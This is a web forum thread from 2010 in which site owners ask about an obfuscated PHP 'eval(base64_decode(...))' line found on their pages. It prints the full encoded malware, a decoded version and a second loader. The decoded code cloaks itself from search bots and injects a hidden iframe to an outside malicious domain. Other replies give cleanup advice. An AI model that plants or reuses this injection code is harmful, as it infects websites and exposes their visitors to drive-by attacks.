1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

Can you someone tell me about this code: <?php /**/ eval(base64_decode(""));?>

Discussion in 'Security' started by learnwebsitedesigncom, Feb 25, 2010.

0
  1. #1
    Can someone tell me about this code: <?php /**/ eval(base64_decode(""));?>

    Thank You
     
    learnwebsitedesigncom, Feb 25, 2010 IP
  2. 0x00

    0x00 Well-Known Member

    Messages:
    122
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    115
    #2
    Executes an encoded code after decoding it.. it all lies in the base64_decode("[THIS BIT]") which if you post we can tell you what does the script execute exactly :)
     
    0x00, Feb 25, 2010 IP
  3. Shagoon

    Shagoon Notable Member

    Messages:
    596
    Likes Received:
    20
    Best Answers:
    0
    Trophy Points:
    220
    #3
    If you found such a thing on your site and you don't know about it and you didn't buy any scripts that are encrypted/protected then it's most likely a shell script that is encrypted.
     
    Shagoon, Feb 25, 2010 IP
  4. learnwebsitedesigncom

    learnwebsitedesigncom Active Member

    Messages:
    264
    Likes Received:
    5
    Best Answers:
    0
    Trophy Points:
    58
    #4
    The exact code is:

    <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gJzxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmV2YWwodW5lc2NhcGUoIiU2NCU2RiU2MyU3NSU2RCU2NSU2RSU3NCUyRSU3NyU3MiU2OSU3NCU2NSUyOCUyNyUzQyU2OSU2NiU3MiU2MSU2RCU2NSUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2OSU3MyU3MyUzOSU3NyUzOCU3MyUzOCUzOSU3OCU3OCUyRSU2RiU3MiU2NyUyRiU2OSU2RSUyRSU3MCU2OCU3MCUyMiUyMCU3NyU2OSU2NCU3NCU2OCUzRCUzMSUyMCU2OCU2NSU2OSU2NyU2OCU3NCUzRCUzMSUyMCU2NiU3MiU2MSU2RCU2NSU2MiU2RiU3MiU2NCU2NSU3MiUzRCUzMCUzRSUzQyUyRiU2OSU2NiU3MiU2MSU2RCU2NSUzRSUyNyUyOSUzQiIpKTwvc2NyaXB0Pic7ICAgICAgfSAgICAgIHJldHVybiAiIjsgICAgIH0gICAgfSAgICAgICAgaWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ICAgICBmdW5jdGlvbiBnemRlY29kZSgkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDKXsgICAgICAkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEPUBvcmQoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLDMsMSkpOyAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9MTA7ICAgICAgJFJBM0Q1MkU1MkE0ODkzNkNERTBGNTM1NkJCMDg2NTJGMj0wOyAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmNCl7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9QHVucGFjaygndicsc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMTAsMikpOyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCPSRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUJbMV07ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTIrJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQjsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY4KXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMTYpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYyKXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MjsgICAgICB9ICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz1AZ3ppbmZsYXRlKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSk7ICAgICAgaWYoJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz09PUZBTFNFKXsgICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz0kUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDOyAgICAgIH0gICAgICByZXR1cm4gJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1MzsgICAgIH0gICAgfSAgICBmdW5jdGlvbiBtcm9iaCgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKXsgICAgIEhlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyAgICAgJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERT1nemRlY29kZSgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKTsgICAgICAgaWYocHJlZ19tYXRjaCgnL1w8XC9ib2R5L3NpJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKSl7ICAgICAgcmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPFwvYm9keVteXD5dKlw+KS9zaScsZ21sKCkuIlxuIi4nJDEnLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpOyAgICAgfWVsc2V7ICAgICAgcmV0dXJuICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUuZ21sKCk7ICAgICB9ICAgIH0gICAgb2Jfc3RhcnQoJ21yb2JoJyk7ICAgfSAgfQ=="));?>
     
    learnwebsitedesigncom, Feb 25, 2010 IP
  5. Shagoon

    Shagoon Notable Member

    Messages:
    596
    Likes Received:
    20
    Best Answers:
    0
    Trophy Points:
    220
    #5
    This is your decrypted code...

    if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){   $GLOBALS['mr_no']=1;   if(!function_exists('mrobh')){      if(!function_exists('gml')){     function gml(){      if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){       return '<script language="javascript">eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%73%73%39%77%38%73%38%39%78%78%2E%6F%72%67%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B"))</script>';      }      return "";     }    }        if(!function_exists('gzdecode')){     function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){      $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));      $RBE4C4D037E939226F65812885A53DAD9=10;      $RA3D52E52A48936CDE0F5356BB08652F2=0;      if($R30B2AB8DC1496D06B230A71D8962AF5D&4){       $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));       $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];       $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;      }      if($R30B2AB8DC1496D06B230A71D8962AF5D&8){       $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;      }      if($R30B2AB8DC1496D06B230A71D8962AF5D&16){       $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;      }      if($R30B2AB8DC1496D06B230A71D8962AF5D&2){       $RBE4C4D037E939226F65812885A53DAD9+=2;      }      $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));      if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){       $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;      }      return $R034AE2AB94F99CC81B389A1822DA3353;     }    }    function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){     Header('Content-Encoding: none');     $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);       if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){      return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);     }else{      return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();     }    }    ob_start('mrobh');   }  }
    Code (markup):
     
    Shagoon, Feb 25, 2010 IP
  6. learnwebsitedesigncom

    learnwebsitedesigncom Active Member

    Messages:
    264
    Likes Received:
    5
    Best Answers:
    0
    Trophy Points:
    58
    #6
    I have a few more questions:

    I am familiar with PHP but not an expert and will try to find more info, but what exactly does the code do?

    What are the most common ways of putting this code into web pages?

    Thanks
     
    learnwebsitedesigncom, Feb 25, 2010 IP
  7. Shagoon

    Shagoon Notable Member

    Messages:
    596
    Likes Received:
    20
    Best Answers:
    0
    Trophy Points:
    220
    #7
    Where do you have this code from?

    It doesn't look like a shell script.
     
    Shagoon, Feb 25, 2010 IP
  8. learnwebsitedesigncom

    learnwebsitedesigncom Active Member

    Messages:
    264
    Likes Received:
    5
    Best Answers:
    0
    Trophy Points:
    58
    #8
    The code is at the very top (the first line) of the pages of one my sites.
     
    learnwebsitedesigncom, Feb 25, 2010 IP
  9. Carl29

    Carl29 Active Member

    Messages:
    114
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    51
    #9
    Hi learnwebsitedesigncom,
    The same thing happened to me, this is the code on top of the php files.
    <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL3Rlc3NmYXMxL3B1YmxpY19odG1sL3Rlc3NmYXNoaW9uLmNvbS9hZG1pbi9pbmNsdWRlcy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL2luZGV4L3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>
<?php
    Code (markup):

    did you manage to clean up that? What would you recommend?
    Thanks :)
     
    Carl29, Mar 1, 2010 IP
  10. WeWatch

    WeWatch Active Member

    Messages:
    75
    Likes Received:
    3
    Best Answers:
    0
    Trophy Points:
    50
    #10
    That code and other code similar to that, allow hackers to remotely infect your website after you've changed FTP passwords.

    Also look in your images folders to see if you have a file called gifimg.php. It's malicious as well.

    From what we've seen, this type of infection is usually the result of a virus on a PC that has FTP access to the infected website. The virus steals the FTP login credentials, sends them to a server which then infects the website using valid FTP login and password.

    The virus works in a variety of ways.

    First, if you're using a program like FileZilla or CuteFTP or any of the other free programs, your login credentials are stored in a plain text file on your PC. For FileZilla, look in: C:\Documents and Settings\(user)\Application Data\FileZilla\sitemanager.xml

    If you have multiple accounts setup in FileZilla, you'll see all of them listed in plain text in that file. That makes it extremely easy for a virus to find and steal.

    Second, the virus works by "sniffing" the FTP traffic leaving your PC. Since FTP transmits all data, including username and password, in plain text, it's easy for the virus to see and steal that information.

    Third, the virus also acts as a keylogger. So for those who don't save their credentials but type it in each time, the virus can still get it.

    I use WS_FTP by IpSwitch because they encrypt their saved credentials. You can also switch to SFTP if your hosting provider supports it. SFTP encrypts the traffic between your PC and the destination.

    Quite often it requires a different anti-virus program to find and remove the virus on the infected PC. The virus learns how to evade detection from the currently installed anti-virus.

    I usually recommend either Kaspersky or Vipre (Sunbelt Software).

    Remove all of those eval(base64_decode strings, then scan all PCs with a different anti-virus program, after changing all FTP passwords.
     
    WeWatch, Mar 1, 2010 IP
  11. Carl29

    Carl29 Active Member

    Messages:
    114
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    51
    #11
    Hi WeWatch,
    By now is almost impossible ( :) ) to have any virus on my PC, I just reinstalled everything to discard any virus. As for the AV, I use Bitdefender IS 2010 with all features on maximum level (firewall+AV), I also use a router with an integrated firewall between my PC and the broadband company router.
    I've changed all ftp passwords and changed user logins.
    As for the ftp client I was using filezilla, now changed to WinSCP, and I dont save passwords anymore...
    My question is, should I clean all the php files or reinstall website from scratch?
    Can the DB be infected also?

    Thanks

    edit: can you please check the htaccess file atached to see if it is not manipulated.
    Thanks again
     

    Attached Files:

    Last edited: Mar 1, 2010
    Carl29, Mar 1, 2010 IP
  12. Archimonde

    Archimonde Peon

    Messages:
    72
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #12
    Hello,
    You want to decode that script. Please see this examp
    <?php eval(base64_decode('xxxxxxxxxxxxxxxxxxxxx');?>
    PHP:
    Change your code :
    <?php echo(base64_decode('xxxxxxxxxxxxxxxxxxxxx');?>
    PHP:
    Then load them via apache, you will see the unencoded source.
     
    Archimonde, Mar 5, 2010 IP